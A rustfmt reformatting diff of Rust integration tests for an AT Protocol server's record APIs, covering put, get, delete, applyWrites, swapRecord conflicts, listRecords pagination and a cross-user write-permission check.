+413 -101
tests/lifecycle_record.rs
··· 26 } 27 }); 28 let create_res = client 29 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 30 .bearer_auth(&jwt) 31 .json(&create_payload) 32 .send() 33 .await 34 .expect("Failed to send create request"); 35 - assert_eq!(create_res.status(), StatusCode::OK, "Failed to create record"); 36 - let create_body: Value = create_res.json().await.expect("create response was not JSON"); 37 let uri = create_body["uri"].as_str().unwrap(); 38 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 39 - let params = [("repo", did.as_str()), ("collection", collection), ("rkey", &rkey)]; 40 let get_res = client 41 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 42 .query(&params) 43 .send() 44 .await 45 .expect("Failed to send get request"); 46 - assert_eq!(get_res.status(), StatusCode::OK, "Failed to get record after create"); 47 let get_body: Value = get_res.json().await.expect("get response was not JSON"); 48 assert_eq!(get_body["uri"], uri); 49 assert_eq!(get_body["value"]["text"], original_text); ··· 56 "swapRecord": initial_cid 57 }); 58 let update_res = client 59 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 60 .bearer_auth(&jwt) 61 .json(&update_payload) 62 .send() 63 .await 64 .expect("Failed to send update request"); 65 - assert_eq!(update_res.status(), StatusCode::OK, "Failed to update record"); 66 - let update_body: Value = update_res.json().await.expect("update response was not JSON"); 67 let updated_cid = update_body["cid"].as_str().unwrap().to_string(); 68 let get_updated_res = client 69 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 70 .query(&params) 71 .send() 72 .await 73 .expect("Failed to send get-after-update request"); 74 - let get_updated_body: Value = get_updated_res.json().await.expect("get-updated response was not JSON"); 75 - assert_eq!(get_updated_body["value"]["text"], updated_text, "Text was not updated"); 76 let stale_update_payload = json!({ 77 "repo": did, 78 "collection": collection, ··· 81 "swapRecord": initial_cid 82 }); 83 let stale_res = client 84 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 85 .bearer_auth(&jwt) 86 .json(&stale_update_payload) 87 .send() 88 .await 89 .expect("Failed to send stale update"); 90 - assert_eq!(stale_res.status(), StatusCode::CONFLICT, "Stale update should cause 409"); 91 let good_update_payload = json!({ 92 "repo": did, 93 "collection": collection, ··· 96 "swapRecord": updated_cid 97 }); 98 let good_res = client 99 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 100 .bearer_auth(&jwt) 101 .json(&good_update_payload) 102 .send() 103 .await 104 .expect("Failed to send good update"); 105 - assert_eq!(good_res.status(), StatusCode::OK, "Good update should succeed"); 106 let delete_payload = json!({ "repo": did, "collection": collection, "rkey": rkey }); 107 let delete_res = client 108 - .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await)) 109 .bearer_auth(&jwt) 110 .json(&delete_payload) 111 .send() 112 .await 113 .expect("Failed to send delete request"); 114 - assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete record"); 115 let get_deleted_res = client 116 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 117 .query(&params) 118 .send() 119 .await 120 .expect("Failed to send get-after-delete request"); 121 - assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Record should be deleted"); 122 } 123 124 #[tokio::test] ··· 127 let (did, jwt) = setup_new_user("profile-blob").await; 128 let blob_data = b"This is test blob data for a profile avatar"; 129 let upload_res = client 130 - .post(format!("{}/xrpc/com.atproto.repo.uploadBlob", base_url().await)) 131 .header(header::CONTENT_TYPE, "text/plain") 132 .bearer_auth(&jwt) 133 .body(blob_data.to_vec()) ··· 149 } 150 }); 151 let create_res = client 152 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 153 .bearer_auth(&jwt) 154 .json(&profile_payload) 155 .send() 156 .await 157 .expect("Failed to create profile"); 158 - assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile"); 159 let create_body: Value = create_res.json().await.unwrap(); 160 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 161 let get_res = client 162 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 163 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 164 .send() 165 .await 166 .expect("Failed to get profile"); ··· 176 "swapRecord": initial_cid 177 }); 178 let update_res = client 179 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 180 .bearer_auth(&jwt) 181 .json(&update_payload) 182 .send() 183 .await 184 .expect("Failed to update profile"); 185 - assert_eq!(update_res.status(), StatusCode::OK, "Failed to update profile"); 186 let get_updated_res = client 187 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 188 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 189 .send() 190 .await 191 .expect("Failed to get updated profile"); ··· 198 let client = client(); 199 let (alice_did, alice_jwt) = setup_new_user("alice-thread").await; 200 let (bob_did, bob_jwt) = setup_new_user("bob-thread").await; 201 - let (root_uri, root_cid) = create_post(&client, &alice_did, &alice_jwt, "This is the root post").await; 202 tokio::time::sleep(Duration::from_millis(100)).await; 203 let reply_collection = "app.bsky.feed.post"; 204 let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis()); ··· 217 } 218 }); 219 let reply_res = client 220 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 221 .bearer_auth(&bob_jwt) 222 .json(&reply_payload) 223 .send() ··· 228 let reply_uri = reply_body["uri"].as_str().unwrap(); 229 let reply_cid = reply_body["cid"].as_str().unwrap(); 230 let get_reply_res = client 231 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 232 - .query(&[("repo", bob_did.as_str()), ("collection", reply_collection), ("rkey", reply_rkey.as_str())]) 233 .send() 234 .await 235 .expect("Failed to get reply"); ··· 253 } 254 }); 255 let nested_res = client 256 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 257 .bearer_auth(&alice_jwt) 258 .json(&nested_payload) 259 .send() 260 .await 261 .expect("Failed to create nested reply"); 262 - assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply"); 263 } 264 265 #[tokio::test] ··· 276 "record": { "$type": "app.bsky.feed.post", "text": "Bob trying to post as Alice", "createdAt": Utc::now().to_rfc3339() } 277 }); 278 let write_res = client 279 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 280 .bearer_auth(&bob_jwt) 281 .json(&post_payload) 282 .send() 283 .await 284 .expect("Failed to send request"); 285 - assert!(write_res.status() == StatusCode::FORBIDDEN || write_res.status() == StatusCode::UNAUTHORIZED, 286 - "Expected 403/401 for writing to another user's repo, got {}", write_res.status()); 287 - let delete_payload = json!({ "repo": alice_did, "collection": "app.bsky.feed.post", "rkey": post_rkey }); 288 let delete_res = client 289 - .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await)) 290 .bearer_auth(&bob_jwt) 291 .json(&delete_payload) 292 .send() 293 .await 294 .expect("Failed to send request"); 295 - assert!(delete_res.status() == StatusCode::FORBIDDEN || delete_res.status() == StatusCode::UNAUTHORIZED, 296 - "Expected 403/401 for deleting another user's record, got {}", delete_res.status()); 297 let get_res = client 298 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 299 - .query(&[("repo", alice_did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", post_rkey)]) 300 .send() 301 .await 302 .expect("Failed to verify record exists"); 303 - assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist"); 304 } 305 306 #[tokio::test] ··· 317 ] 318 }); 319 let apply_res = client 320 - .post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await)) 321 .bearer_auth(&jwt) 322 .json(&writes_payload) 323 .send() ··· 325 .expect("Failed to apply writes"); 326 assert_eq!(apply_res.status(), StatusCode::OK); 327 let get_post1 = client 328 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 329 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")]) 330 - .send().await.expect("Failed to get post 1"); 331 assert_eq!(get_post1.status(), StatusCode::OK); 332 let post1_body: Value = get_post1.json().await.unwrap(); 333 assert_eq!(post1_body["value"]["text"], "First batch post"); 334 let get_post2 = client 335 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 336 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-2")]) 337 - .send().await.expect("Failed to get post 2"); 338 assert_eq!(get_post2.status(), StatusCode::OK); 339 let get_profile = client 340 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 341 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 342 - .send().await.expect("Failed to get profile"); 343 let profile_body: Value = get_profile.json().await.unwrap(); 344 assert_eq!(profile_body["value"]["displayName"], "Batch User"); 345 let update_writes = json!({ ··· 350 ] 351 }); 352 let update_res = client 353 - .post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await)) 354 .bearer_auth(&jwt) 355 .json(&update_writes) 356 .send() ··· 358 .expect("Failed to apply update writes"); 359 assert_eq!(update_res.status(), StatusCode::OK); 360 let get_updated_profile = client 361 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 362 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 363 - .send().await.expect("Failed to get updated profile"); 364 let updated_profile: Value = get_updated_profile.json().await.unwrap(); 365 - assert_eq!(updated_profile["value"]["displayName"], "Updated Batch User"); 366 let get_deleted_post = client 367 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 368 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")]) 369 - .send().await.expect("Failed to check deleted post"); 370 - assert_eq!(get_deleted_post.status(), StatusCode::NOT_FOUND, "Batch-deleted post should be gone"); 371 } 372 373 - async fn create_post_with_rkey(client: &reqwest::Client, did: &str, jwt: &str, rkey: &str, text: &str) -> (String, String) { 374 let payload = json!({ 375 "repo": did, "collection": "app.bsky.feed.post", "rkey": rkey, 376 "record": { "$type": "app.bsky.feed.post", "text": text, "createdAt": Utc::now().to_rfc3339() } 377 }); 378 let res = client 379 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 380 .bearer_auth(jwt) 381 .json(&payload) 382 .send() ··· 384 .expect("Failed to create record"); 385 assert_eq!(res.status(), StatusCode::OK); 386 let body: Value = res.json().await.unwrap(); 387 - (body["uri"].as_str().unwrap().to_string(), body["cid"].as_str().unwrap().to_string()) 388 } 389 390 #[tokio::test] ··· 392 let client = client(); 393 let (did, jwt) = setup_new_user("list-records-test").await; 394 for i in 0..5 { 395 - create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 396 tokio::time::sleep(Duration::from_millis(50)).await; 397 } 398 let res = client 399 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 400 .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 401 - .send().await.expect("Failed to list records"); 402 assert_eq!(res.status(), StatusCode::OK); 403 let body: Value = res.json().await.unwrap(); 404 let records = body["records"].as_array().unwrap(); 405 assert_eq!(records.len(), 5); 406 - let rkeys: Vec<&str> = records.iter().map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 407 - assert_eq!(rkeys, vec!["post04", "post03", "post02", "post01", "post00"], "Default order should be DESC"); 408 for record in records { 409 assert!(record["uri"].is_string()); 410 assert!(record["cid"].is_string()); ··· 412 assert!(record["value"].is_object()); 413 } 414 let rev_res = client 415 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 416 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("reverse", "true")]) 417 - .send().await.expect("Failed to list records reverse"); 418 let rev_body: Value = rev_res.json().await.unwrap(); 419 - let rev_rkeys: Vec<&str> = rev_body["records"].as_array().unwrap().iter() 420 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 421 - assert_eq!(rev_rkeys, vec!["post00", "post01", "post02", "post03", "post04"], "reverse=true should give ASC"); 422 let page1 = client 423 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 424 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2")]) 425 - .send().await.expect("Failed to list page 1"); 426 let page1_body: Value = page1.json().await.unwrap(); 427 let page1_records = page1_body["records"].as_array().unwrap(); 428 assert_eq!(page1_records.len(), 2); 429 let cursor = page1_body["cursor"].as_str().expect("Should have cursor"); 430 let page2 = client 431 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 432 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2"), ("cursor", cursor)]) 433 - .send().await.expect("Failed to list page 2"); 434 let page2_body: Value = page2.json().await.unwrap(); 435 let page2_records = page2_body["records"].as_array().unwrap(); 436 assert_eq!(page2_records.len(), 2); 437 - let all_uris: Vec<&str> = page1_records.iter().chain(page2_records.iter()) 438 - .map(|r| r["uri"].as_str().unwrap()).collect(); 439 let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 440 - assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records"); 441 let range_res = client 442 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 443 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), 444 - ("rkeyStart", "post01"), ("rkeyEnd", "post03"), ("reverse", "true")]) 445 - .send().await.expect("Failed to list range"); 446 let range_body: Value = range_res.json().await.unwrap(); 447 - let range_rkeys: Vec<&str> = range_body["records"].as_array().unwrap().iter() 448 - .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 449 for rkey in &range_rkeys { 450 - assert!(*rkey >= "post01" && *rkey <= "post03", "Range should be inclusive"); 451 } 452 let limit_res = client 453 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 454 - .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "1000")]) 455 - .send().await.expect("Failed with high limit"); 456 let limit_body: Value = limit_res.json().await.unwrap(); 457 - assert!(limit_body["records"].as_array().unwrap().len() <= 100, "Limit should be clamped to max 100"); 458 let not_found_res = client 459 - .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 460 - .query(&[("repo", "did:plc:nonexistent12345"), ("collection", "app.bsky.feed.post")]) 461 - .send().await.expect("Failed with nonexistent repo"); 462 assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND); 463 }
··· 26 } 27 }); 28 let create_res = client 29 + .post(format!( 30 + "{}/xrpc/com.atproto.repo.putRecord", 31 + base_url().await 32 + )) 33 .bearer_auth(&jwt) 34 .json(&create_payload) 35 .send() 36 .await 37 .expect("Failed to send create request"); 38 + assert_eq!( 39 + create_res.status(), 40 + StatusCode::OK, 41 + "Failed to create record" 42 + ); 43 + let create_body: Value = create_res 44 + .json() 45 + .await 46 + .expect("create response was not JSON"); 47 let uri = create_body["uri"].as_str().unwrap(); 48 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 49 + let params = [ 50 + ("repo", did.as_str()), 51 + ("collection", collection), 52 + ("rkey", &rkey), 53 + ]; 54 let get_res = client 55 + .get(format!( 56 + "{}/xrpc/com.atproto.repo.getRecord", 57 + base_url().await 58 + )) 59 .query(&params) 60 .send() 61 .await 62 .expect("Failed to send get request"); 63 + assert_eq!( 64 + get_res.status(), 65 + StatusCode::OK, 66 + "Failed to get record after create" 67 + ); 68 let get_body: Value = get_res.json().await.expect("get response was not JSON"); 69 assert_eq!(get_body["uri"], uri); 70 assert_eq!(get_body["value"]["text"], original_text); ··· 77 "swapRecord": initial_cid 78 }); 79 let update_res = client 80 + .post(format!( 81 + "{}/xrpc/com.atproto.repo.putRecord", 82 + base_url().await 83 + )) 84 .bearer_auth(&jwt) 85 .json(&update_payload) 86 .send() 87 .await 88 .expect("Failed to send update request"); 89 + assert_eq!( 90 + update_res.status(), 91 + StatusCode::OK, 92 + "Failed to update record" 93 + ); 94 + let update_body: Value = update_res 95 + .json() 96 + .await 97 + .expect("update response was not JSON"); 98 let updated_cid = update_body["cid"].as_str().unwrap().to_string(); 99 let get_updated_res = client 100 + .get(format!( 101 + "{}/xrpc/com.atproto.repo.getRecord", 102 + base_url().await 103 + )) 104 .query(&params) 105 .send() 106 .await 107 .expect("Failed to send get-after-update request"); 108 + let get_updated_body: Value = get_updated_res 109 + .json() 110 + .await 111 + .expect("get-updated response was not JSON"); 112 + assert_eq!( 113 + get_updated_body["value"]["text"], updated_text, 114 + "Text was not updated" 115 + ); 116 let stale_update_payload = json!({ 117 "repo": did, 118 "collection": collection, ··· 121 "swapRecord": initial_cid 122 }); 123 let stale_res = client 124 + .post(format!( 125 + "{}/xrpc/com.atproto.repo.putRecord", 126 + base_url().await 127 + )) 128 .bearer_auth(&jwt) 129 .json(&stale_update_payload) 130 .send() 131 .await 132 .expect("Failed to send stale update"); 133 + assert_eq!( 134 + stale_res.status(), 135 + StatusCode::CONFLICT, 136 + "Stale update should cause 409" 137 + ); 138 let good_update_payload = json!({ 139 "repo": did, 140 "collection": collection, ··· 143 "swapRecord": updated_cid 144 }); 145 let good_res = client 146 + .post(format!( 147 + "{}/xrpc/com.atproto.repo.putRecord", 148 + base_url().await 149 + )) 150 .bearer_auth(&jwt) 151 .json(&good_update_payload) 152 .send() 153 .await 154 .expect("Failed to send good update"); 155 + assert_eq!( 156 + good_res.status(), 157 + StatusCode::OK, 158 + "Good update should succeed" 159 + ); 160 let delete_payload = json!({ "repo": did, "collection": collection, "rkey": rkey }); 161 let delete_res = client 162 + .post(format!( 163 + "{}/xrpc/com.atproto.repo.deleteRecord", 164 + base_url().await 165 + )) 166 .bearer_auth(&jwt) 167 .json(&delete_payload) 168 .send() 169 .await 170 .expect("Failed to send delete request"); 171 + assert_eq!( 172 + delete_res.status(), 173 + StatusCode::OK, 174 + "Failed to delete record" 175 + ); 176 let get_deleted_res = client 177 + .get(format!( 178 + "{}/xrpc/com.atproto.repo.getRecord", 179 + base_url().await 180 + )) 181 .query(&params) 182 .send() 183 .await 184 .expect("Failed to send get-after-delete request"); 185 + assert_eq!( 186 + get_deleted_res.status(), 187 + StatusCode::NOT_FOUND, 188 + "Record should be deleted" 189 + ); 190 } 191 192 #[tokio::test] ··· 195 let (did, jwt) = setup_new_user("profile-blob").await; 196 let blob_data = b"This is test blob data for a profile avatar"; 197 let upload_res = client 198 + .post(format!( 199 + "{}/xrpc/com.atproto.repo.uploadBlob", 200 + base_url().await 201 + )) 202 .header(header::CONTENT_TYPE, "text/plain") 203 .bearer_auth(&jwt) 204 .body(blob_data.to_vec()) ··· 220 } 221 }); 222 let create_res = client 223 + .post(format!( 224 + "{}/xrpc/com.atproto.repo.putRecord", 225 + base_url().await 226 + )) 227 .bearer_auth(&jwt) 228 .json(&profile_payload) 229 .send() 230 .await 231 .expect("Failed to create profile"); 232 + assert_eq!( 233 + create_res.status(), 234 + StatusCode::OK, 235 + "Failed to create profile" 236 + ); 237 let create_body: Value = create_res.json().await.unwrap(); 238 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 239 let get_res = client 240 + .get(format!( 241 + "{}/xrpc/com.atproto.repo.getRecord", 242 + base_url().await 243 + )) 244 + .query(&[ 245 + ("repo", did.as_str()), 246 + ("collection", "app.bsky.actor.profile"), 247 + ("rkey", "self"), 248 + ]) 249 .send() 250 .await 251 .expect("Failed to get profile"); ··· 261 "swapRecord": initial_cid 262 }); 263 let update_res = client 264 + .post(format!( 265 + "{}/xrpc/com.atproto.repo.putRecord", 266 + base_url().await 267 + )) 268 .bearer_auth(&jwt) 269 .json(&update_payload) 270 .send() 271 .await 272 .expect("Failed to update profile"); 273 + assert_eq!( 274 + update_res.status(), 275 + StatusCode::OK, 276 + "Failed to update profile" 277 + ); 278 let get_updated_res = client 279 + .get(format!( 280 + "{}/xrpc/com.atproto.repo.getRecord", 281 + base_url().await 282 + )) 283 + .query(&[ 284 + ("repo", did.as_str()), 285 + ("collection", "app.bsky.actor.profile"), 286 + ("rkey", "self"), 287 + ]) 288 .send() 289 .await 290 .expect("Failed to get updated profile"); ··· 297 let client = client(); 298 let (alice_did, alice_jwt) = setup_new_user("alice-thread").await; 299 let (bob_did, bob_jwt) = setup_new_user("bob-thread").await; 300 + let (root_uri, root_cid) = 301 + create_post(&client, &alice_did, &alice_jwt, "This is the root post").await; 302 tokio::time::sleep(Duration::from_millis(100)).await; 303 let reply_collection = "app.bsky.feed.post"; 304 let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis()); ··· 317 } 318 }); 319 let reply_res = client 320 + .post(format!( 321 + "{}/xrpc/com.atproto.repo.putRecord", 322 + base_url().await 323 + )) 324 .bearer_auth(&bob_jwt) 325 .json(&reply_payload) 326 .send() ··· 331 let reply_uri = reply_body["uri"].as_str().unwrap(); 332 let reply_cid = reply_body["cid"].as_str().unwrap(); 333 let get_reply_res = client 334 + .get(format!( 335 + "{}/xrpc/com.atproto.repo.getRecord", 336 + base_url().await 337 + )) 338 + .query(&[ 339 + ("repo", bob_did.as_str()), 340 + ("collection", reply_collection), 341 + ("rkey", reply_rkey.as_str()), 342 + ]) 343 .send() 344 .await 345 .expect("Failed to get reply"); ··· 363 } 364 }); 365 let nested_res = client 366 + .post(format!( 367 + "{}/xrpc/com.atproto.repo.putRecord", 368 + base_url().await 369 + )) 370 .bearer_auth(&alice_jwt) 371 .json(&nested_payload) 372 .send() 373 .await 374 .expect("Failed to create nested reply"); 375 + assert_eq!( 376 + nested_res.status(), 377 + StatusCode::OK, 378 + "Failed to create nested reply" 379 + ); 380 } 381 382 #[tokio::test] ··· 393 "record": { "$type": "app.bsky.feed.post", "text": "Bob trying to post as Alice", "createdAt": Utc::now().to_rfc3339() } 394 }); 395 let write_res = client 396 + .post(format!( 397 + "{}/xrpc/com.atproto.repo.putRecord", 398 + base_url().await 399 + )) 400 .bearer_auth(&bob_jwt) 401 .json(&post_payload) 402 .send() 403 .await 404 .expect("Failed to send request"); 405 + assert!( 406 + write_res.status() == StatusCode::FORBIDDEN 407 + || write_res.status() == StatusCode::UNAUTHORIZED, 408 + "Expected 403/401 for writing to another user's repo, got {}", 409 + write_res.status() 410 + ); 411 + let delete_payload = 412 + json!({ "repo": alice_did, "collection": "app.bsky.feed.post", "rkey": post_rkey }); 413 let delete_res = client 414 + .post(format!( 415 + "{}/xrpc/com.atproto.repo.deleteRecord", 416 + base_url().await 417 + )) 418 .bearer_auth(&bob_jwt) 419 .json(&delete_payload) 420 .send() 421 .await 422 .expect("Failed to send request"); 423 + assert!( 424 + delete_res.status() == StatusCode::FORBIDDEN 425 + || delete_res.status() == StatusCode::UNAUTHORIZED, 426 + "Expected 403/401 for deleting another user's record, got {}", 427 + delete_res.status() 428 + ); 429 let get_res = client 430 + .get(format!( 431 + "{}/xrpc/com.atproto.repo.getRecord", 432 + base_url().await 433 + )) 434 + .query(&[ 435 + ("repo", alice_did.as_str()), 436 + ("collection", "app.bsky.feed.post"), 437 + ("rkey", post_rkey), 438 + ]) 439 .send() 440 .await 441 .expect("Failed to verify record exists"); 442 + assert_eq!( 443 + get_res.status(), 444 + StatusCode::OK, 445 + "Record should still exist" 446 + ); 447 } 448 449 #[tokio::test] ··· 460 ] 461 }); 462 let apply_res = client 463 + .post(format!( 464 + "{}/xrpc/com.atproto.repo.applyWrites", 465 + base_url().await 466 + )) 467 .bearer_auth(&jwt) 468 .json(&writes_payload) 469 .send() ··· 471 .expect("Failed to apply writes"); 472 assert_eq!(apply_res.status(), StatusCode::OK); 473 let get_post1 = client 474 + .get(format!( 475 + "{}/xrpc/com.atproto.repo.getRecord", 476 + base_url().await 477 + )) 478 + .query(&[ 479 + ("repo", did.as_str()), 480 + ("collection", "app.bsky.feed.post"), 481 + ("rkey", "batch-post-1"), 482 + ]) 483 + .send() 484 + .await 485 + .expect("Failed to get post 1"); 486 assert_eq!(get_post1.status(), StatusCode::OK); 487 let post1_body: Value = get_post1.json().await.unwrap(); 488 assert_eq!(post1_body["value"]["text"], "First batch post"); 489 let get_post2 = client 490 + .get(format!( 491 + "{}/xrpc/com.atproto.repo.getRecord", 492 + base_url().await 493 + )) 494 + .query(&[ 495 + ("repo", did.as_str()), 496 + ("collection", "app.bsky.feed.post"), 497 + ("rkey", "batch-post-2"), 498 + ]) 499 + .send() 500 + .await 501 + .expect("Failed to get post 2"); 502 assert_eq!(get_post2.status(), StatusCode::OK); 503 let get_profile = client 504 + .get(format!( 505 + "{}/xrpc/com.atproto.repo.getRecord", 506 + base_url().await 507 + )) 508 + .query(&[ 509 + ("repo", did.as_str()), 510 + ("collection", "app.bsky.actor.profile"), 511 + ("rkey", "self"), 512 + ]) 513 + .send() 514 + .await 515 + .expect("Failed to get profile"); 516 let profile_body: Value = get_profile.json().await.unwrap(); 517 assert_eq!(profile_body["value"]["displayName"], "Batch User"); 518 let update_writes = json!({ ··· 523 ] 524 }); 525 let update_res = client 526 + .post(format!( 527 + "{}/xrpc/com.atproto.repo.applyWrites", 528 + base_url().await 529 + )) 530 .bearer_auth(&jwt) 531 .json(&update_writes) 532 .send() ··· 534 .expect("Failed to apply update writes"); 535 assert_eq!(update_res.status(), StatusCode::OK); 536 let get_updated_profile = client 537 + .get(format!( 538 + "{}/xrpc/com.atproto.repo.getRecord", 539 + base_url().await 540 + )) 541 + .query(&[ 542 + ("repo", did.as_str()), 543 + ("collection", "app.bsky.actor.profile"), 544 + ("rkey", "self"), 545 + ]) 546 + .send() 547 + .await 548 + .expect("Failed to get updated profile"); 549 let updated_profile: Value = get_updated_profile.json().await.unwrap(); 550 + assert_eq!( 551 + updated_profile["value"]["displayName"], 552 + "Updated Batch User" 553 + ); 554 let get_deleted_post = client 555 + .get(format!( 556 + "{}/xrpc/com.atproto.repo.getRecord", 557 + base_url().await 558 + )) 559 + .query(&[ 560 + ("repo", did.as_str()), 561 + ("collection", "app.bsky.feed.post"), 562 + ("rkey", "batch-post-1"), 563 + ]) 564 + .send() 565 + .await 566 + .expect("Failed to check deleted post"); 567 + assert_eq!( 568 + get_deleted_post.status(), 569 + StatusCode::NOT_FOUND, 570 + "Batch-deleted post should be gone" 571 + ); 572 } 573 574 + async fn create_post_with_rkey( 575 + client: &reqwest::Client, 576 + did: &str, 577 + jwt: &str, 578 + rkey: &str, 579 + text: &str, 580 + ) -> (String, String) { 581 let payload = json!({ 582 "repo": did, "collection": "app.bsky.feed.post", "rkey": rkey, 583 "record": { "$type": "app.bsky.feed.post", "text": text, "createdAt": Utc::now().to_rfc3339() } 584 }); 585 let res = client 586 + .post(format!( 587 + "{}/xrpc/com.atproto.repo.putRecord", 588 + base_url().await 589 + )) 590 .bearer_auth(jwt) 591 .json(&payload) 592 .send() ··· 594 .expect("Failed to create record"); 595 assert_eq!(res.status(), StatusCode::OK); 596 let body: Value = res.json().await.unwrap(); 597 + ( 598 + body["uri"].as_str().unwrap().to_string(), 599 + body["cid"].as_str().unwrap().to_string(), 600 + ) 601 } 602 603 #[tokio::test] ··· 605 let client = client(); 606 let (did, jwt) = setup_new_user("list-records-test").await; 607 for i in 0..5 { 608 + create_post_with_rkey( 609 + &client, 610 + &did, 611 + &jwt, 612 + &format!("post{:02}", i), 613 + &format!("Post {}", i), 614 + ) 615 + .await; 616 tokio::time::sleep(Duration::from_millis(50)).await; 617 } 618 let res = client 619 + .get(format!( 620 + "{}/xrpc/com.atproto.repo.listRecords", 621 + base_url().await 622 + )) 623 .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 624 + .send() 625 + .await 626 + .expect("Failed to list records"); 627 assert_eq!(res.status(), StatusCode::OK); 628 let body: Value = res.json().await.unwrap(); 629 let records = body["records"].as_array().unwrap(); 630 assert_eq!(records.len(), 5); 631 + let rkeys: Vec<&str> = records 632 + .iter() 633 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 634 + .collect(); 635 + assert_eq!( 636 + rkeys, 637 + vec!["post04", "post03", "post02", "post01", "post00"], 638 + "Default order should be DESC" 639 + ); 640 for record in records { 641 assert!(record["uri"].is_string()); 642 assert!(record["cid"].is_string()); ··· 644 assert!(record["value"].is_object()); 645 } 646 let rev_res = client 647 + .get(format!( 648 + "{}/xrpc/com.atproto.repo.listRecords", 649 + base_url().await 650 + )) 651 + .query(&[ 652 + ("repo", did.as_str()), 653 + ("collection", "app.bsky.feed.post"), 654 + ("reverse", "true"), 655 + ]) 656 + .send() 657 + .await 658 + .expect("Failed to list records reverse"); 659 let rev_body: Value = rev_res.json().await.unwrap(); 660 + let rev_rkeys: Vec<&str> = rev_body["records"] 661 + .as_array() 662 + .unwrap() 663 + .iter() 664 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 665 + .collect(); 666 + assert_eq!( 667 + rev_rkeys, 668 + vec!["post00", "post01", "post02", "post03", "post04"], 669 + "reverse=true should give ASC" 670 + ); 671 let page1 = client 672 + .get(format!( 673 + "{}/xrpc/com.atproto.repo.listRecords", 674 + base_url().await 675 + )) 676 + .query(&[ 677 + ("repo", did.as_str()), 678 + ("collection", "app.bsky.feed.post"), 679 + ("limit", "2"), 680 + ]) 681 + .send() 682 + .await 683 + .expect("Failed to list page 1"); 684 let page1_body: Value = page1.json().await.unwrap(); 685 let page1_records = page1_body["records"].as_array().unwrap(); 686 assert_eq!(page1_records.len(), 2); 687 let cursor = page1_body["cursor"].as_str().expect("Should have cursor"); 688 let page2 = client 689 + .get(format!( 690 + 